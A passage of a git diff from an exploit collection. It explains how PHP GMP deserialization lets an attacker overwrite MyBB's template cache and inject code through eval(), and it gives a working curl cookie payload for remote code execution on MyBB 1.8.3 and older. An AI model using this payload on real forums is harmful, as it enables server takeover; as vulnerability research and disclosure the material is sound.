`$cache`, we will be albe to inject PHP code via eval() function. + +inc/init.php +``` +$error_handler = new errorHandler(); +... +$maintimer = new timer(); +... +$mybb = new MyBB; +... +switch($config['database']['type']) +{ + case "sqlite": + $db = new DB_SQLite; + break; + case "pgsql": + $db = new DB_PgSQL; + break; + case "mysqli": + $db = new DB_MySQLi; + break; + default: + $db = new DB_MySQL; +} +... +$templates = new templates; +``` + +The `$templates` object was instantiated in init.php, and four objects was instantiated in this before. This means the `$templates` object's handle was set to `5` and stored into objects store, so we can access the `$templates` object and update the `$cache` property via convert GMP object into integer-type `ZVAL` that value is `5` in during GMP deserialization. This also means we can inject PHP code via eval() function. + +When MyBB <= 1.8.3 and PHP 5.6 <= 5.6.11, remote code execution by just using curl on the command line: +``` +curl --cookie 'mybb[forumread]=a:1:{i:0%3bC:3:"GMP":106:{s:1:"5"%3ba:2:{s:5:"cache"%3ba:1:{s:5:"index"%3bs:14:"{${phpinfo()}}"%3b}i:0%3bO:12:"DateInterval":1:{s:1:"y"%3bR:2%3b}}}}' http://127.0.0.1/mybb/ +``` \ No newline at end of file diff --git a/platforms/windows/local/9971.php b/platforms/windows/dos/9971.php similarity index 100% rename from platforms/windows/local/9971.php rename to platforms/windows/dos/9971.php diff --git a/platforms/windows/remote/41148.html b/platforms/windows/remote/41148.html new file mode 100755 index 000000000..187fff0d4 --- /dev/null +++ b/platforms/windows/remote/41148.html @@ -0,0 +1,155 @@ + + + +
+